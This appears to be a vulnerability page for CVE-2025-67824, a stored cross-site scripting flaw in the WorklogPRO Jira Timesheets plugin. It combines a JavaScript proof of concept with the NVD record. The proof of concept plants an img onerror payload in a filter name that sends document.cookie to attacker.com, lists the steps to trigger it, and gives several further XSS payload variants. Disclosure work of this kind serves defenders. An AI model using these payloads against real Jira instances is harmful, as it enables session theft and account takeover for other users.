CVE-2025-67824

// CVE-2025-67824 PoC - Stored XSS via Filter Name // Target: WorklogPRO - Jira Timesheets plugin // Malicious filter name payload const maliciousPayload = '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">'; // Attack scenario: // 1. Create a new filter with the malicious name // 2. Go to Timesheets -> Custom Timesheet Dialog // 3. Select the filter with malicious name as timesheet type // 4. The XSS payload will be executed when the dialog renders // Example filter creation request (authenticated user): const filterData = { name: maliciousPayload, jql: 'project IS NOT EMPTY', description: 'Benign description' }; // The filter name is stored without sanitization // When other users view timesheets using this filter, XSS triggers // Simplified XSS payload variants: // 1. <script>alert('XSS')</script> // 2. <img src=x onerror=alert('XSS')> // 3. <svg onload=alert('XSS')> // 4. <body onload=alert('XSS')>

{"cve": {"id": "CVE-2025-67824", "sourceIdentifier": "[email protected]", "published": "2026-01-20T16:16:06.517", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WorklogPRO - Jira Timesheets plugin in the Jira Data Center before 4.24.2-jira9, 4.24.2-jira10 and 4.24.2-jira11 allows attackers to inject arbitrary HTML or JavaScript via XSS. This is exploited via a crafted payload placed in the name of a filter. This code is executed in the browser when the user attempts to create a timesheet with the filter timesheet type on the custom timesheet dialog because the filter name is not properly sanitized during the action."}, {"lang": "es", "value": "El plugin WorklogPRO - Jira Timesheets en el Jira Data Center antes de 4.24.2-jira9, 4.24.2-jira10 y 4.24.2-jira11 permite a los atacantes inyectar HTML o JavaScript arbitrario a través de XSS. Esto se explota a través de una carga útil manipulada colocada en el nombre de un filtro. Este código se ejecuta en el navegador cuando el usuario intenta crear una hoja de horas con el tipo de hoja de horas de filtro en el diálogo de hoja de horas personalizada porque el nombre del filtro no se sanea correctamente durante la acción."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://marketplace.atlassian.com/apps/1212626/worklogpro-timesheets-for-jira/version-history", "source": "[email protected]"}, {"url": "https://thestarware.atlassian.net/wiki/x/CAAdyg", "source": "[email protected]"}]}}